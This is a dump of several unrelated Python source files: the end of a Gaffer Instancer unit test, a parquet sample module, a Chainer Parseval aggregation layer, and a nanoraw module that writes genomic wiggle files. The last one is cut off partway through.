# With massive quantization, all values collapse
instancer["contextVariables"][0]["quantize"].setValue( 100 )
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = [ 0 for i in range(0, 100, 4) ] )
self.assertEqual( uniqueCounts(), { "" : 4, "floatVar" : 1 } )
# With moderate quantization, we can see how different prototypes combine with the contexts to produce
# more unique values
instancer["contextVariables"][0]["quantize"].setValue( 1 )
floatExpected = [ compatRound( 2 * math.sin( i ) ) for i in range(0, 100, 4) ]
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "" : 20, "floatVar" : 5 } )
instancer["prototypeRootsList"].setValue( IECore.StringVectorData( [ "withAttrs", "cube", "plane", "sphere" ] ) )
testAttributes( frameAttr = [ 1 ] * 25, floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "" : 20, "floatVar" : 5 } )
# Test an empty root
instancer["prototypeRootsList"].setValue( IECore.StringVectorData( [ "withAttrs", "", "plane", "sphere" ] ) )
self.assertEqual( uniqueCounts(), { "" : 15, "floatVar" : 5 } )
# Now lets just focus on context variation
instancer["prototypeRootsList"].setValue( IECore.StringVectorData( [] ) )
instancer["prototypeIndex"].setValue( '' )
floatExpected = [ compatRound( 2 * math.sin( i ) ) for i in range(0, 100) ]
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "" : 5, "floatVar" : 5 } )
# Add a second context variation
instancer["contextVariables"].addChild( GafferScene.Instancer.ContextVariablePlug( "context" ) )
instancer["contextVariables"][1]["name"].setValue( "vectorVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
vectorAttr = [ imath.V3f( i + 2, i + 3, i + 4 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "vectorVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 10 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
vectorAttr = [ imath.V3f( quant( i + 2, 10 ), quant( i + 3, 10 ), quant( i + 4, 10 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "vectorVar" : 31, "" : 64 } )
# Try all the different types
instancer["contextVariables"][1]["name"].setValue( "uvVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
uvAttr = [ imath.V2f( i * 0.01, i * 0.02 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "uvVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
uvAttr = [ imath.V2f( compatRound( i * 0.01 ), compatRound( i * 0.02 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "uvVar" : 4, "" : 20 } )
instancer["contextVariables"][1]["name"].setValue( "intVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
intAttr = [ i for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "intVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 10 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
intAttr = [ quant( i, 10 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "intVar" : 11, "" : 48 } )
instancer["contextVariables"][1]["name"].setValue( "stringVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
stringAttr = [ "foo%i" % ( i / 34 ) for i in range(100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "stringVar" : 3, "" : 15 } )
instancer["contextVariables"][1]["quantize"].setValue( 10 )
six.assertRaisesRegex( self,
Gaffer.ProcessException, 'Instancer.out.attributes : Context variable "0" : cannot quantize variable of type StringVectorData',
instancer['out'].attributes, "points/instances/withAttrs/0/sphere"
)
six.assertRaisesRegex( self,
Gaffer.ProcessException, 'Instancer.variations : Context variable "0" : cannot quantize variable of type StringVectorData',
uniqueCounts
)
instancer["contextVariables"][1]["name"].setValue( "colorVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
colorAttr = [ imath.Color3f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "colorVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
colorAttr = [ imath.Color3f( compatRound( i * 0.1 + 2 ), compatRound( i * 0.1 + 3 ), compatRound( i * 0.1 + 4 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "colorVar" : 11, "" : 48 } )
instancer["contextVariables"][1]["name"].setValue( "color4fVar" )
instancer["contextVariables"][1]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
color4fAttr = [ imath.Color4f( i * 0.1 + 2, i * 0.1 + 3, i * 0.1 + 4, i * 0.1 + 5 ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 100, "" : 100 } )
instancer["contextVariables"][1]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected,
color4fAttr = [ imath.Color4f( compatRound( i * 0.1 + 2 ), compatRound( i * 0.1 + 3 ), compatRound( i * 0.1 + 4 ), compatRound( i * 0.1 + 5 ) ) for i in range(0, 100) ]
)
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 11, "" : 48 } )
# Set a high quantize so we can see how these variations interact with other types of variations
instancer["contextVariables"][1]["quantize"].setValue( 10 )
color4fExpected = [ imath.Color4f( quant( i * 0.1 + 2, 10 ), quant( i * 0.1 + 3, 10 ), quant( i * 0.1 + 4, 10 ), quant( i * 0.1 + 5, 10 ) ) for i in range(0, 100) ]
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "" : 20 } )
instancer["seedEnabled"].setValue( True )
instancer["rawSeed"].setValue( True )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr = list( range( 100 ) ) )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 100, "" : 100 } )
instancer["rawSeed"].setValue( False )
instancer["seeds"].setValue( 10 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
initialFirstVal = instancer['out'].attributes( '/points/instances/withAttrs/0/sphere' )["seedAttr"]
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "" : 67 } )
# Changing the seed changes individual values, but not the overall behaviour
instancer["seedPermutation"].setValue( 1 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertNotEqual( initialFirstVal, instancer['out'].attributes( '/points/instances/withAttrs/0/sphere' )["seedAttr"] )
# Total variation count is a bit different because the different variation sources line up differently
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "" : 69 } )
# If we generate 100 seeds from 100 ids, we will get many collisions, and only 67 unique values
instancer["seeds"].setValue( 100 )
testAttributes( frameAttr = [ 1 ] * 100, floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 67 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 67, "" : 94 } )
# Now turn on time offset as well and play with everything together
instancer["seeds"].setValue( 10 )
instancer["timeOffset"]["enabled"].setValue( True )
instancer["timeOffset"]["name"].setValue( 'floatVar' )
instancer["timeOffset"]["quantize"].setValue( 0.0 )
testAttributes( frameAttr = [ 1 + 2 * math.sin( i ) for i in range(0, 100) ], floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 100, "" : 100 } )
instancer["timeOffset"]["quantize"].setValue( 0.5 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 9, "" : 82 } )
instancer["timeOffset"]["quantize"].setValue( 1 )
testAttributes( frameAttr = [ i + 1 for i in floatExpected ], floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 5, "" : 69 } )
c = Gaffer.Context()
c["frame"] = IECore.FloatData( 42 )
with c:
testAttributes( frameAttr = [ i + 42 for i in floatExpected ], floatAttr = floatExpected, color4fAttr = color4fExpected, seedAttr_seedCount = 10 )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "seed" : 10, "frame" : 5, "" : 69 } )
# Now reduce back down the variations to test different cumulative combinations
instancer["seedEnabled"].setValue( False )
testAttributes( frameAttr = [ i + 1 for i in floatExpected ], floatAttr = floatExpected, color4fAttr = color4fExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "color4fVar" : 4, "frame" : 5, "" : 20 } )
# With just one context var, driven by the same prim var as frame, with the same quantization,
# the variations don't multiply
del instancer["contextVariables"][1]
testAttributes( frameAttr = [ i + 1 for i in floatExpected ], floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "frame" : 5, "" : 5 } )
# Using a different source primVar means the variations will multiply
instancer["timeOffset"]["name"].setValue( 'intVar' )
instancer["timeOffset"]["quantize"].setValue( 0 )
testAttributes( frameAttr = [ i + 1 for i in range(100) ], floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "frame" : 100, "" : 100 } )
instancer["timeOffset"]["quantize"].setValue( 20 )
testAttributes( frameAttr = [ ((i+10)//20)*20 + 1 for i in range(100) ], floatAttr = floatExpected )
self.assertEqual( uniqueCounts(), { "floatVar" : 5, "frame" : 6, "" : 30 } )
# Test with multiple point sources
pointsMerge = GafferScene.Parent()
pointsMerge["parent"].setValue( '/' )
pointSources = []
for j in range( 3 ):
points = IECoreScene.PointsPrimitive(
IECore.V3fVectorData(
[ imath.V3f( i, 0, 0 ) for i in range( 10 ) ]
)
)
points["floatVar"] = IECoreScene.PrimitiveVariable( IECoreScene.PrimitiveVariable.Interpolation.Vertex, IECore.FloatVectorData(
[ i * 0.1 + j for i in range( 10 ) ]
) )
pointSources.append( GafferScene.ObjectToScene() )
pointSources[-1]["name"].setValue( "points" )
pointSources[-1]["object"].setValue( points )
parent["children"][-1].setInput( pointSources[-1]["out"] )
instancer["in"].setInput( parent["out"] )
instancer["timeOffset"]["enabled"].setValue( False )
instancer["contextVariables"][0]["quantize"].setValue( 0 )
pointsFilter["paths"].setValue( IECore.StringVectorData( [ '/points*' ] ) )
self.assertAlmostEqual( instancer['out'].attributes( "points/instances/withAttrs/2/sphere" )["floatAttr"].value, 0.2 )
self.assertAlmostEqual( instancer['out'].attributes( "points1/instances/withAttrs/3/sphere" )["floatAttr"].value, 1.3 )
self.assertAlmostEqual( instancer['out'].attributes( "points2/instances/withAttrs/5/sphere" )["floatAttr"].value, 2.5 )
self.assertEqual( uniqueCounts(), { "floatVar" : 30, "" : 30 } )
instancer["contextVariables"][0]["quantize"].setValue( 0.2001 )
self.assertAlmostEqual( instancer['out'].attributes( "points/instances/withAttrs/2/sphere" )["floatAttr"].value, 0.2001, places = 6 )
self.assertAlmostEqual( instancer['out'].attributes( "points1/instances/withAttrs/3/sphere" )["floatAttr"].value, 1.2006, places = 6 )
self.assertAlmostEqual( instancer['out'].attributes( "points2/instances/withAttrs/5/sphere" )["floatAttr"].value, 2.4012, places = 6 )
self.assertEqual( uniqueCounts(), { "floatVar" : 15, "" : 15 } )
# Test invalid location
for func in [ instancer["out"].object, instancer["out"].childNames, instancer["out"].bound, instancer["out"].transform ]:
six.assertRaisesRegex( self,
Gaffer.ProcessException,
'Instancer.out.' + func.__name__ + ' : Instance id "777" is invalid, instancer produces only 10 children. Topology may have changed during shutter.',
func, "/points/instances/withAttrs/777"
)
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
def testContextSet( self ):
baseSphere = GafferScene.Sphere()
childSphere = GafferScene.Sphere()
parent = GafferScene.Parent()
parent["in"].setInput( baseSphere["out"] )
parent["children"][0].setInput( childSphere["out"] )
parent["parent"].setValue( '/sphere' )
parent["expression"] = Gaffer.Expression()
# Note that we must supply a default for the value of "seed", since the setNames will be evaluated
# with no context set
parent["expression"].setExpression( 'parent["enabled"] = context.get( "seed", 0 ) % 2' )
allFilter = GafferScene.PathFilter()
allFilter["paths"].setValue( IECore.StringVectorData( [ '/...' ] ) )
setNode = GafferScene.Set()
setNode["in"].setInput( parent["out"] )
setNode["filter"].setInput( allFilter["out"] )
plane = GafferScene.Plane()
pathFilter = GafferScene.PathFilter()
pathFilter["paths"].setValue( IECore.StringVectorData( [ '/plane' ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["filter"].setInput( pathFilter["out"] )
instancer["prototypes"].setInput( setNode["out"] )
instancer["rawSeed"].setValue( True )
with Gaffer.Context() as c :
c["seed"] = 0
self.assertEqual(
set( instancer["out"].set( "set" ).value.paths() ),
set( [ "/plane/instances/sphere/" + i for i in [ "0", "1", "2", "3" ] ] )
)
c["seed"] = 1
self.assertEqual(
set( instancer["out"].set( "set" ).value.paths() ),
set( [ "/plane/instances/sphere/" + i for i in
[ "0", "1", "2", "3", "0/sphere", "1/sphere", "2/sphere", "3/sphere" ] ]
)
)
instancer["seedEnabled"].setValue( True )
self.assertEqual(
set( instancer["out"].set( "set" ).value.paths() ),
set( [ "/plane/instances/sphere/" + i for i in [ "0", "1", "2", "3", "1/sphere", "3/sphere" ] ] )
)
# When encapsulating, we shouldn't pay any time cost for evaluating the set, even with a huge
# number of instances
plane["divisions"].setValue( imath.V2i( 1000 ) )
instancer["encapsulateInstanceGroups"].setValue( True )
t = time.time()
instancer["out"].set( "set" )
totalTime = time.time() - t
self.assertLess( totalTime, 0.001 )
# Test passthrough when disabled
instancer["enabled"].setValue( False )
self.assertScenesEqual( instancer["in"], instancer["out"] )
def runTestContextSetPerf( self, useContexts, parallelEvaluate ):
plane = GafferScene.Plane()
plane["divisions"].setValue( imath.V2i( 1000 ) )
plane["divisionExpression"] = Gaffer.Expression()
plane["divisionExpression"].setExpression( 'parent["divisions"] = imath.V2i( 1000 + int( context["collect:rootName"][-1:] ) )' )
# Duplicate the source points, so that we are measuring the perf of an Instancer targeting multiple locations
collectScenes = GafferScene.CollectScenes()
collectScenes["in"].setInput( plane["out"] )
collectScenes["rootNames"].setValue( IECore.StringVectorData( [ 'plane0', 'plane1', 'plane2', 'plane3', 'plane4' ] ) )
collectScenes["sourceRoot"].setValue( '/plane' )
# Source scene, with a little hierarchy, so paths aren't trivial to merge
sphere = GafferScene.Sphere()
group = GafferScene.Group( "group" )
group["in"][0].setInput( sphere["out"] )
# Create a set
leafFilter = GafferScene.PathFilter()
leafFilter["paths"].setValue( IECore.StringVectorData( [ '/group/sphere' ] ) )
setNode = GafferScene.Set()
setNode["in"].setInput( group["out"] )
setNode["filter"].setInput( leafFilter["out"] )
# Instancer
instancerFilter = GafferScene.PathFilter()
instancerFilter["paths"].setValue( IECore.StringVectorData( [ '/plane*' ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( collectScenes["out"] )
instancer["filter"].setInput( instancerFilter["out"] )
instancer["prototypes"].setInput( setNode["out"] )
instancer["seedEnabled"].setValue( useContexts )
if not parallelEvaluate:
with GafferTest.TestRunner.PerformanceScope() :
instancer["out"].set( "set" )
else:
# Set up a slightly realistic scene which results in the set plug being
# pulled multiple times in parallel, to check whether TaskCollaborate is working
setFilter = GafferScene.SetFilter()
setFilter["setExpression"].setValue( 'set' )
customAttributes = GafferScene.CustomAttributes()
customAttributes["attributes"].addChild( Gaffer.NameValuePlug( "", Gaffer.BoolPlug( "value", defaultValue = False, flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic, ), True, "member1", Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic ) )
customAttributes["in"].setInput( instancer["out"] )
customAttributes["filter"].setInput( setFilter["out"] )
customAttributes["attributes"]["member1"]["name"].setValue( 'testAttr' )
customAttributes["attributes"]["member1"]["value"].setValue( True )
subTree = GafferScene.SubTree()
subTree["in"].setInput( customAttributes["out"] )
subTree["root"].setValue( '/plane0/instances/group' )
isolateFilter = GafferScene.PathFilter()
isolateFilter["paths"].setValue( IECore.StringVectorData( [ '/67000*' ] ) )
isolate = GafferScene.Isolate()
isolate["in"].setInput( subTree["out"] )
isolate["filter"].setInput( isolateFilter["out"] )
with GafferTest.TestRunner.PerformanceScope() :
GafferSceneTest.traverseScene( isolate["out"] )
def testEmptyPrototypes( self ) :
plane = GafferScene.Plane()
planeFilter = GafferScene.PathFilter()
planeFilter["paths"].setValue( IECore.StringVectorData( [ "/plane" ] ) )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["filter"].setInput( planeFilter["out"] )
self.assertEqual( instancer["variations"].getValue(), IECore.CompoundData( { "" : IECore.IntData( 0 ) } ) )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfNoVariationsSingleEvaluate( self ):
self.runTestContextSetPerf( False, False )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfNoVariationsParallelEvaluate( self ):
self.runTestContextSetPerf( False, True )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfWithVariationsSingleEvaluate( self ):
self.runTestContextSetPerf( True, False )
@unittest.skipIf( GafferTest.inCI(), "Performance not relevant on CI platform" )
@GafferTest.TestRunner.PerformanceTestMethod()
def testContextSetPerfWithVariationsParallelEvaluate( self ):
self.runTestContextSetPerf( True, True )
if __name__ == "__main__":
unittest.main()
|
py | 1a4bad056324d505f5854c0331d2f7272704f220 | """Module test for target-parquet functionality."""
# Reuse the tap connection rather than create a new target connection:
from samples.sample_target_parquet.parquet_target import SampleTargetParquet
from samples.sample_target_parquet.parquet_target_sink import SampleParquetTargetSink
__all__ = [
"SampleTargetParquet",
"SampleParquetTargetSink",
]
|
py | 1a4bad47898018cf071953680b208b38b31554ff | import chainer
class ParsevalAddition(chainer.function.Function):
"""Implementation of aggregation layer for Parseval networks.
Only two to one mapping is supported.
"""
def forward(self, inputs):
x0, x1, alpha = inputs
return x0 * alpha[0] + x1 * alpha[1],
def backward(self, inputs, grad_outputs):
x0, x1, alpha = inputs
gy = grad_outputs[0]
xp = chainer.cuda.get_array_module(gy)
ga = xp.array([(gy * x0).sum(), (gy * x1).sum()], xp.float32)
return gy * alpha[0], gy * alpha[1], ga
|
py | 1a4baeeaddcdbd983857e54377a6e76d237db12c | import sys, os
import numpy as np
from collections import defaultdict
import nanoraw_stats as ns
import nanoraw_helper as nh
VERBOSE = False
SMALLEST_PVAL=1e-15
WIG_HEADER='track type=wiggle_0 name="{0}_{1}_{2}{3}" ' + \
'description="{0} {1} {2}{4}"\n'
GROUP2_NAME='group2'
def write_wiggle(wig_base, group_text, data_values, type_name,
filter_zeros=False):
group_w_dot = '' if group_text == '' else '.' + group_text
group_w_us = '' if group_text == '' else '_' + group_text
group_w_space = '' if group_text == '' else ' ' + group_text
plus_wig_fp = open(
wig_base + '.' + type_name + group_w_dot + '.plus.wig', 'w')
minus_wig_fp = open(
wig_base + '.' + type_name + group_w_dot + '.minus.wig', 'w')
plus_wig_fp.write(WIG_HEADER.format(
wig_base, type_name, 'fwd_strand', group_w_us, group_w_space))
minus_wig_fp.write(WIG_HEADER.format(
wig_base, type_name, 'rev_strand', group_w_us, group_w_space))
for (chrm, strand), chrm_values in data_values.iteritems():
wig_fp = plus_wig_fp if strand == '+' else minus_wig_fp
wig_fp.write("variableStep chrom={} span=1\n".format(chrm))
wig_fp.write('\n'.join([
str(int(pos) + 1) + " " + str(round(val, 4))
for pos, val in enumerate(chrm_values)
if not (np.isnan(val) or (
filter_zeros and np.equal(val, 0.0)))]) + '\n')
plus_wig_fp.close()
minus_wig_fp.close()
return
def write_pvals_and_qvals_wig(
all_stats, wig_base, write_pvals, write_qvals):
if VERBOSE: sys.stderr.write('Parsing statistics.\n')
raw_chrm_strand_stats = defaultdict(list)
for (pval_f, qval_f, pval, qval, pos, chrm, strand,
cov1, cov2) in all_stats:
raw_chrm_strand_stats[(chrm, strand)].append((pos, pval, qval))
chrm_strand_pvals = {}
chrm_strand_qvals = {}
for chrm_strand, stats in raw_chrm_strand_stats.iteritems():
chrm_poss = zip(*stats)[0]
raw_chrm_pvals = zip(*stats)[1]
raw_chrm_qvals = zip(*stats)[2]
max_pos = max(chrm_poss)
# arrange and store p-values
chrm_pvals = np.empty(max_pos + 1)
chrm_pvals[:] = np.nan
np.put(chrm_pvals, chrm_poss, raw_chrm_pvals)
chrm_strand_pvals[chrm_strand] = -np.log10(np.maximum(
SMALLEST_PVAL, chrm_pvals))
# arrange and store q-values
chrm_qvals = np.empty(max_pos + 1)
chrm_qvals[:] = np.nan
np.put(chrm_qvals, chrm_poss, raw_chrm_qvals)
chrm_strand_qvals[chrm_strand] = -np.log10(np.maximum(
SMALLEST_PVAL, chrm_qvals))
if VERBOSE: sys.stderr.write('Writing statistics wig(s).\n')
if write_pvals:
write_wiggle(wig_base, '', chrm_strand_pvals, 'neg_log10_pvals')
if write_qvals:
write_wiggle(wig_base, '', chrm_strand_qvals, 'neg_log10_qvals')
return
def get_chrm_sizes(raw_read_coverage, raw_read_coverage2=None):
strand_chrm_sizes = defaultdict(list)
for (chrm, strand), cs_read_cov in \
raw_read_coverage.iteritems():
strand_chrm_sizes[chrm].append(max(
r_data.end for r_data in cs_read_cov))
if raw_read_coverage2 is not None:
for (chrm, strand), cs_read_cov in \
raw_read_coverage2.iteritems():
strand_chrm_sizes[chrm].append(max(
r_data.end for r_data in cs_read_cov))
return dict(
(chrm, max(strnd_sizes))
for chrm, strnd_sizes in
strand_chrm_sizes.iteritems())
def write_length_wig(
raw_read_coverage, chrm_sizes, wig_base, group_name):
if VERBOSE: sys.stderr.write('Parsing events lengths.\n')
base_lens = nh.get_base_lengths(raw_read_coverage, chrm_sizes)
if VERBOSE: sys.stderr.write('Writing length wig.\n')
write_wiggle(wig_base, group_name, base_lens, 'length')
return
def write_signal_sd_wig(
raw_read_coverage, chrm_sizes, wig_base, group_name):
if VERBOSE: sys.stderr.write('Parsing signal SDs.\n')
base_sds = nh.get_base_sds(raw_read_coverage, chrm_sizes)
if VERBOSE: sys.stderr.write('Writing signal SD wig.\n')
write_wiggle(wig_base, group_name, base_sds, 'signalSd')
return
def write_signal_and_diff_wigs(
raw_read_coverage1, raw_read_coverage2, chrm_sizes,
wig_base, group1_name, write_sig, write_diff):
if VERBOSE: sys.stderr.write('Parsing mean base signals.\n')
base_means1 = nh.get_base_means(raw_read_coverage1, chrm_sizes)
if raw_read_coverage2 is not None:
base_means2 = nh.get_base_means(raw_read_coverage2, chrm_sizes)
if write_diff:
if VERBOSE: sys.stderr.write(
'Calculating signal differences.\n')
sig_diffs = {}
for chrm, strand in [(c, s) for c in chrm_sizes.keys()
for s in ('+', '-')]:
# calculate difference and set no coverage
# (nan) values to zero
sig_diffs[(chrm, strand)] \
= base_means1[(chrm, strand)] - \
base_means2[(chrm, strand)]
if VERBOSE: sys.stderr.write('Writing differnce wig.\n')
write_wiggle(wig_base, '', sig_diffs, 'difference')
if write_sig:
if VERBOSE: sys.stderr.write('Writing signal wigs.\n')
write_wiggle(wig_base, GROUP2_NAME, base_means2, 'signal')
if write_sig:
write_wiggle(wig_base, group1_name, base_means1, 'signal')
return
def write_cov_wig(raw_read_coverage, wig_base, group_text):
read_coverage = nh.get_coverage(raw_read_coverage)
if VERBOSE: sys.stderr.write('Writing coverage wig.\n')
write_wiggle(wig_base, group_text, read_coverage, 'coverage', True)
return
def write_all_wiggles(
files1, files2, corrected_group, basecall_subgroups, obs_filter,
test_type, min_test_vals, stats_fn, fishers_method_offset,
wig_base, wig_types):
stats_file_exists = stats_fn is not None and os.path.isfile(stats_fn)
include_stats = 'pvals' in wig_types or 'qvals' in wig_types
if include_stats and stats_file_exists:
if VERBOSE: sys.stderr.write('Loading statistics from file.\n')
all_stats = ns.parse_stats(stats_fn)
if VERBOSE: sys.stderr.write('Parsing FAST5 files.\n')
raw_read_coverage1 = nh.parse_fast5s(
files1, corrected_group, basecall_subgroups)
raw_read_coverage1 = nh.filter_reads(raw_read_coverage1, obs_filter)
group1_name = '' if files2 is None else 'group1'
if files2 is not None:
raw_read_coverage2 = nh.parse_fast5s(
files2, corrected_group, basecall_subgroups)
raw_read_coverage2 = nh.filter_reads(
raw_read_coverage2, obs_filter)
chrm_sizes = get_chrm_sizes(
raw_read_coverage1, raw_read_coverage2)
if include_stats and not stats_file_exists:
if VERBOSE: sys.stderr.write('Calculating statistics.\n')
all_stats = ns.get_all_significance(
raw_read_coverage1, raw_read_coverage2, test_type,
min_test_vals, stats_fn, fishers_method_offset)
if VERBOSE: sys.stderr.write('Writing wiggles.\n')
if 'coverage' in wig_types:
write_cov_wig(raw_read_coverage2, wig_base, GROUP2_NAME)
if 'signal_sd' in wig_types:
write_signal_sd_wig(
raw_read_coverage2, chrm_sizes, wig_base, GROUP2_NAME)
if 'length' in wig_types:
write_length_wig(raw_read_coverage2, chrm_sizes,
wig_base, GROUP2_NAME)
# need to do signal and difference call once either with or
# w/o second set of files (unlike coverage, sds and length
if 'signal' in wig_types or 'difference' in wig_types:
write_signal_and_diff_wigs(
raw_read_coverage1, raw_read_coverage2, chrm_sizes,
wig_base, group1_name, 'signal' in wig_types,
'difference' in wig_types)
else:
chrm_sizes = get_chrm_sizes(raw_read_coverage1)
if VERBOSE: sys.stderr.write('Writing wiggles.\n')
if 'signal' in wig_types:
write_signal_and_diff_wigs(
raw_read_coverage1, None, chrm_sizes, wig_base,
group1_name, 'signal' in wig_types, False)
if 'coverage' in wig_types:
write_cov_wig(raw_read_coverage1, wig_base, group1_name)
if 'signal_sd' in wig_types:
write_signal_sd_wig(raw_read_coverage1, chrm_sizes,
wig_base, group1_name)
if 'length' in wig_types:
write_length_wig(raw_read_coverage1, chrm_sizes,
wig_base, group1_name)
if 'pvals' in wig_types or 'qvals' in wig_types:
write_pvals_and_qvals_wig(
all_stats, wig_base, 'pvals' in wig_types,
'qvals' in wig_types)
return
def write_most_signif(
files1, files2, num_regions, qval_thresh, corrected_group,
basecall_subgroups, seqs_fn, num_bases, test_type, obs_filter,
min_test_vals, stats_fn, fasta_fn, fishers_method_offset):
calc_stats = stats_fn is None or not os.path.isfile(stats_fn)
if not calc_stats:
if VERBOSE: sys.stderr.write('Loading statistics from file.\n')
all_stats = ns.parse_stats(stats_fn)
if calc_stats or fasta_fn is None:
if VERBOSE: sys.stderr.write('Parsing files.\n')
raw_read_coverage1 = nh.parse_fast5s(
files1, corrected_group, basecall_subgroups)
raw_read_coverage2 = nh.parse_fast5s(
files2, corrected_group, basecall_subgroups)
raw_read_coverage1 = nh.filter_reads(
raw_read_coverage1, obs_filter)
raw_read_coverage2 = nh.filter_reads(
raw_read_coverage2, obs_filter)
if calc_stats:
if VERBOSE: sys.stderr.write('Calculating statistics.\n')
all_stats = ns.get_all_significance(
raw_read_coverage1, raw_read_coverage2, test_type,
min_test_vals, stats_fn, fishers_method_offset)
plot_intervals = ns.get_most_signif_regions(
all_stats, num_bases, num_regions, qval_thresh)
if fasta_fn is None:
reg_seqs = get_region_sequences(
plot_intervals, raw_read_coverage1, raw_read_coverage2,
num_bases, corrected_group)
else:
fasta_records = nh.parse_fasta(fasta_fn)
reg_seqs = [
(p_int, fasta_records[chrm][start:start+num_bases])
for p_int, (chrm, start, strand, reg_name)
in plot_intervals if chrm in fasta_records]
# get reads overlapping each region
if VERBOSE: sys.stderr.write('Outputting region seqeuences.\n')
with open(seqs_fn, 'w') as seqs_fp:
for reg_i, reg_seq in reg_seqs:
chrm, start, strand, stat = next(
p_int for p_reg_i, p_int in plot_intervals
if p_reg_i == reg_i)
if strand == '-':
reg_seq = nh.rev_comp(reg_seq)
seqs_fp.write('>{0}::{1:d}::{2} {3}\n{4}\n'.format(
chrm, start, strand, stat, ''.join(reg_seq)))
return
def wiggle_main(args):
global VERBOSE
VERBOSE = not args.quiet
nh.VERBOSE = VERBOSE
ns.VERBOSE = VERBOSE
if (any(data_type in args.wiggle_types
for data_type in ['pvals', 'qvals']) and
args.fast5_basedirs2 is None and
args.statistics_filename is None):
sys.stderr.write(
'*' * 60 + '\nERROR: Must provide either two sets of ' +
'FAST5s or a statistics filename to output ' +
'pvals and/or qvals wiggle files.\n' + '*' * 60 + '\n')
sys.exit()
if ('difference' in args.wiggle_types and
args.fast5_basedirs2 is None):
sys.stderr.write(
